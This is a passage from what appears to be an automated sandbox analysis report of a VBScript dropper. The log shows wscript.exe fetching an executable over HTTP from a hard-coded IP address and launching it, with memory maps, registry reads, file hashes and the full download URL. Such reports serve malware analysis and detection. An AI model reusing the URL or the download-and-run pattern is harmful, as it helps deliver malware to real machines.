| Get Environment String | name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Program Files\Microsoft Office\root\Office16 |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\aETAdzjz\AppData\Local\Temp |
|
1 |
Process #12: wscript.exe
90
6
| Information | Value |
|---|---|
| ID | #12 |
| File Name | c:\windows\syswow64\wscript.exe |
| Command Line | "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\ |
| Monitor | Start Time: 00:01:26, Reason: Child Process |
| Unmonitor | End Time: 00:01:31, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x9c0 |
| Parent PID | 0x330 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
9BC
0x
9B8
0x
5F0
0x
9C8
0x
9CC
0x
B0
0x
1C8
0x
7AC
0x
34C
0x
B70
0x
BB0
0x
8CC
0x
2B0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00036fff | Pagefile Backed Memory | r |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00070fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000080000 | 0x00080000 | 0x00080fff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x00090000 | 0x0009efff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000000a0000 | 0x000a0000 | 0x000a0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001b0000 | 0x00216fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00220fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| zmxzaa.vbs | 0x00270000 | 0x00270fff | Memory Mapped File | r |
|
|
|
- |
| rsaenh.dll | 0x00270000 | 0x002abfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| zmxzaa.vbs | 0x00280000 | 0x00280fff | Memory Mapped File | r |
|
|
|
|
| private_0x0000000000280000 | 0x00280000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| msxml3r.dll | 0x002c0000 | 0x002c0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d1fff | Pagefile Backed Memory | r |
|
|
|
- |
| windowsshell.manifest | 0x002e0000 | 0x002e0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000002e0000 | 0x002e0000 | 0x002e0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00371fff | Pagefile Backed Memory | r |
|
|
|
- |
| index.dat | 0x00380000 | 0x0038bfff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| index.dat | 0x003d0000 | 0x003d7fff | Memory Mapped File | rw |
|
|
|
- |
| index.dat | 0x003e0000 | 0x003effff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x0052ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x0057ffff | Private Memory | rw |
|
|
|
- |
| msxml3.dll | 0x00580000 | 0x005a7fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000005b0000 | 0x005b0000 | 0x005cffff | Private Memory | - |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x0061ffff | Private Memory | rw |
|
|
|
- |
| wscript.exe | 0x00630000 | 0x00655fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000660000 | 0x00660000 | 0x007e7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007f0000 | 0x007f0000 | 0x00970fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x01d7ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001d80000 | 0x01d80000 | 0x020c2fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000020d0000 | 0x020d0000 | 0x021aefff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000021d0000 | 0x021d0000 | 0x0220ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000022b0000 | 0x022b0000 | 0x022effff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x022f0000 | 0x023affff | Memory Mapped File | rw |
|
|
|
- |
| private_0x00000000023d0000 | 0x023d0000 | 0x024cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x024d0000 | 0x0279efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000027a0000 | 0x027a0000 | 0x0289ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000028c0000 | 0x028c0000 | 0x029bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000029d0000 | 0x029d0000 | 0x02acffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000002ad0000 | 0x02ad0000 | 0x02ecffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000002f20000 | 0x02f20000 | 0x0301ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x0315ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003020000 | 0x03020000 | 0x0310ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003090000 | 0x03090000 | 0x030cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000030d0000 | 0x030d0000 | 0x0310ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003150000 | 0x03150000 | 0x0315ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003160000 | 0x03160000 | 0x032effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003160000 | 0x03160000 | 0x0329ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003180000 | 0x03180000 | 0x031bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003260000 | 0x03260000 | 0x0329ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032b0000 | 0x032b0000 | 0x032effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000032f0000 | 0x032f0000 | 0x0340ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003420000 | 0x03420000 | 0x0345ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003460000 | 0x03460000 | 0x0367ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000034d0000 | 0x034d0000 | 0x035cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003640000 | 0x03640000 | 0x0367ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003680000 | 0x03680000 | 0x0387ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003680000 | 0x03680000 | 0x0377ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003840000 | 0x03840000 | 0x0387ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003880000 | 0x03880000 | 0x03c7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003c80000 | 0x03c80000 | 0x03d7ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000003d80000 | 0x03d80000 | 0x03efffff | Private Memory | rw |
|
|
|
- |
| msxml3.dll | 0x74490000 | 0x745c2fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74960000 | 0x74afdfff | Memory Mapped File | rwx |
|
|
|
- |
| scrrun.dll | 0x74b00000 | 0x74b29fff | Memory Mapped File | rwx |
|
|
|
- |
| mpr.dll | 0x74b30000 | 0x74b41fff | Memory Mapped File | rwx |
|
|
|
- |
| wshom.ocx | 0x74b50000 | 0x74b70fff | Memory Mapped File | rwx |
|
|
|
- |
| scrobj.dll | 0x74b80000 | 0x74bacfff | Memory Mapped File | rwx |
|
|
|
- |
| rasman.dll | 0x74c60000 | 0x74c74fff | Memory Mapped File | rwx |
|
|
|
- |
| rasapi32.dll | 0x74c80000 | 0x74cd1fff | Memory Mapped File | rwx |
|
|
|
- |
| iphlpapi.dll | 0x74ce0000 | 0x74cfbfff | Memory Mapped File | rwx |
|
|
|
- |
| dnsapi.dll | 0x74d00000 | 0x74d43fff | Memory Mapped File | rwx |
|
|
|
- |
| winnsi.dll | 0x74f80000 | 0x74f86fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x74f90000 | 0x74f98fff | Memory Mapped File | rwx |
|
|
|
- |
| wshext.dll | 0x74fa0000 | 0x74fb5fff | Memory Mapped File | rwx |
|
|
|
- |
| msisip.dll | 0x74fc0000 | 0x74fc7fff | Memory Mapped File | rwx |
|
|
|
- |
| vbscript.dll | 0x74fd0000 | 0x7503afff | Memory Mapped File | rwx |
|
|
|
- |
| sxs.dll | 0x75040000 | 0x7509efff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x750a0000 | 0x750dafff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x750e0000 | 0x750f5fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x75100000 | 0x75183fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x751f0000 | 0x75202fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x75210000 | 0x7528ffff | Memory Mapped File | rwx |
|
|
|
- |
| wow64cpu.dll | 0x752a0000 | 0x752a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x752b0000 | 0x7530bfff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x75310000 | 0x7534efff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75350000 | 0x7535dfff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x75950000 | 0x7595afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x75970000 | 0x7597bfff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x75980000 | 0x759dffff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x759e0000 | 0x759f8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x75a10000 | 0x75abbfff | Memory Mapped File | rwx |
|
|
|
- |
| urlmon.dll | 0x75ac0000 | 0x75bf5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75c00000 | 0x75c5ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x75c60000 | 0x75cb6fff | Memory Mapped File | rwx |
|
|
|
- |
| wintrust.dll | 0x75cc0000 | 0x75cecfff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x75cf0000 | 0x75e4bfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75e50000 | 0x75f1bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75f40000 | 0x75f85fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x75fa0000 | 0x7603cfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x76040000 | 0x760c2fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x760d0000 | 0x761bffff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x76220000 | 0x7632ffff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x76330000 | 0x7644cfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x76450000 | 0x76484fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76490000 | 0x7652ffff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x76720000 | 0x767aefff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x767e0000 | 0x769dafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76a70000 | 0x76afffff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x76b00000 | 0x77749fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x77800000 | 0x7780bfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77810000 | 0x77819fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77820000 | 0x7791ffff | Memory Mapped File | rwx |
|
|
|
- |
| wininet.dll | 0x77920000 | 0x77a14fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000077a20000 | 0x77a20000 | 0x77b19fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000077b20000 | 0x77b20000 | 0x77c3efff | Private Memory | rwx |
|
|
|
- |
| ntdll.dll | 0x77c40000 | 0x77de8fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x77df0000 | 0x77df5fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77e20000 | 0x77f9ffff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efa1000 | 0x7efa1000 | 0x7efa3fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa4000 | 0x7efa4000 | 0x7efa6fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efa7000 | 0x7efa7000 | 0x7efa9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efaa000 | 0x7efaa000 | 0x7efacfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efad000 | 0x7efad000 | 0x7efaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007efd5000 | 0x7efd5000 | 0x7efd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | r |
|
|
|
- |
|
For performance reasons, the remaining 70 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| JSTCHV.eXe | 632.26 KB |
MD5:
f2a1e85ad4553d1635710f8f2fc7b05c
SHA1: 5b0615a2f233d44247b622c28609482c37011479 SHA256: 7af206d26e5e800eed7cab38bab599b92e4705b418c23000bb6ff8dc459ca1ed SSDeep: 6144:qjr2f8SaxdwqjoYyCBgV2T3B6D4/1VthocE+WEiOlT9+vzoAuDq2:L1axdndBgV2bmc1fhRWkwzoDj |
|
|
Host Behavior
COM (7)
| Operation | Class | Interface | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Create | B54F3741-5B07-11CF-A4B0-00AA004A55E8 | 00000000-0000-0000-C000-000000000046 | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | 6C736DB1-BD94-11D0-8A23-00AA00B58E10 | 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | 06290BD1-48AA-11D2-8432-006008C3FBFC | E4D1C9B0-46E8-11D4-A2A6-00104BD35090 | cls_context = CLSCTX_INPROC_SERVER |
|
1 | |
| Create | wscript.shell | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | MSXML2.XMLHTTP | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Create | ADODB.Stream | IClassFactory | cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER |
|
1 | |
| Execute | MSXML2.XMLHTTP | IDispatch | method_name = Open |
|
1 |
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | JSTCHV.eXe | - |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | type = size |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | type = size |
|
1 | |
| Read | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | size = 1470, size_out = 1470 |
|
1 | |
| Write | JSTCHV.eXe | size = 647432 |
|
1 |
Registry (27)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\.vBS | - |
|
1 | |
| Open Key | HKEY_CLASSES_ROOT\VBSFile\ScriptEngine | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Enabled, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = LogSecuritySuccesses, data = 3, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = IgnoreUserSettings, data = 205, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 214, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 205, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = TrustPolicy, data = 214, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = UseWINSAFER, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 160, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 1, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = Timeout, data = 160, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings | value_name = DisplayLogo, data = 49, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\.vBS | data = VBSFile, type = REG_SZ |
|
1 | |
| Read Value | HKEY_CLASSES_ROOT\VBSFile\ScriptEngine | data = VBScript, type = REG_SZ |
|
1 |
Module (19)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x76220000 |
|
1 | |
| Load | ole32.dll | base_address = 0x75cf0000 |
|
1 | |
| Load | C:\Windows\system32\advapi32.dll | base_address = 0x76490000 |
|
1 | |
| Get Handle | c:\windows\syswow64\wscript.exe | base_address = 0x630000 |
|
3 | |
| Get Handle | c:\windows\syswow64\ole32.dll | base_address = 0x75cf0000 |
|
1 | |
| Get Filename | c:\windows\syswow64\wscript.exe | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\WScript.exe, size = 261 |
|
1 | |
| Get Filename | - | process_name = c:\windows\syswow64\wscript.exe, file_name_orig = C:\Windows\SysWOW64\WScript.exe, size = 261 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSetInformation, address_out = 0x76235651 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoCreateInstance, address_out = 0x75d39d0b |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferIdentifyLevel, address_out = 0x764b2102 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferComputeTokenFromLevel, address_out = 0x764b3352 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = SaferCloseLevel, address_out = 0x764b3825 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CLSIDFromProgIDEx, address_out = 0x75d00782 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoGetClassObject, address_out = 0x75d254ad |
|
1 | |
| Get Address | c:\windows\syswow64\wscript.exe | function = 1, address_out = 0x632bb9 |
|
1 | |
| Create Mapping | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | filename = C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS, protection = PAGE_READONLY, maximum_size = 1470 |
|
1 | |
| Map | C:\Users\aETAdzjz\AppData\Local\Temp\ZMXZAA.vBS | process_name = c:\windows\syswow64\wscript.exe, desired_access = FILE_MAP_READ |
|
1 |
Window (2)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = WSH-Timer, wndproc_parameter = 140752 |
|
1 | |
| Set Attribute | - | class_name = WSH-Timer, index = 18446744073709551595, new_long = 140752 |
|
1 |
System (15)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Sleep | duration = -1 (infinite) |
|
2 | |
| Get Time | type = System Time, time = 2018-11-27 09:37:11 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 143692 |
|
1 | |
| Get Time | type = Ticks, time = 143801 |
|
1 | |
| Get Time | type = Ticks, time = 146094 |
|
1 | |
| Get Info | type = Operating System |
|
5 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = System Directory |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Hardware Information |
|
1 |
Network Behavior
HTTP Sessions (1)
| Information | Value |
|---|---|
| Total Data Sent | 339 bytes |
| Total Data Received | 632.26 KB |
| Contacted Host Count | 1 |
| Contacted Hosts | 82.118.242.107 |
HTTP Session #1
| Information | Value |
|---|---|
| User Agent | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729) |
| Server Name | 82.118.242.107 |
| Server Port | 80 |
| Data Sent | 339 |
| Data Received | 647432 |
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; Win64; x64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS |
|
1 | |
| Open Connection | protocol = http, server_name = 82.118.242.107, server_port = 80 |
|
1 | |
| Open HTTP Request | http_verb = GET, http_version = HTTP 1.1, target_resource = /~able/1_ga/al/al.exe |
|
1 | |
| Send HTTP Request | url = http://82.118.242.107/~able/1_ga/al/al.exe |
|
1 | |
| Receive HTTP Status | status = 200 |
|
1 | |
| Read Response | size_out = 647432 |
|
1 |
Process #13: jstchv.exe
329
0
| Information | Value |
|---|---|
| ID | #13 |
| File Name | c:\users\aetadzjz\appdata\local\temp\jstchv.exe |
| Command Line | "C:\Users\aETAdzjz\AppData\Local\Temp\JSTCHV.eXe" |
| Initial Working Directory | C:\Users\aETAdzjz\AppData\Local\Temp\ |
| Monitor | Start Time: 00:01:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:09, Reason: Self Terminated |
| Monitor Duration | 00:00:39 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8d0 |
| Parent PID | 0x9c0 (c:\windows\syswow64\wscript.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
144
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| apisetschema.dll | 0x00040000 | 0x00040fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0036ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| rsaenh.dll | 0x00220000 | 0x0025bfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00226fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00231fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00261fff | Private Memory | rw |
|
|
|
- |
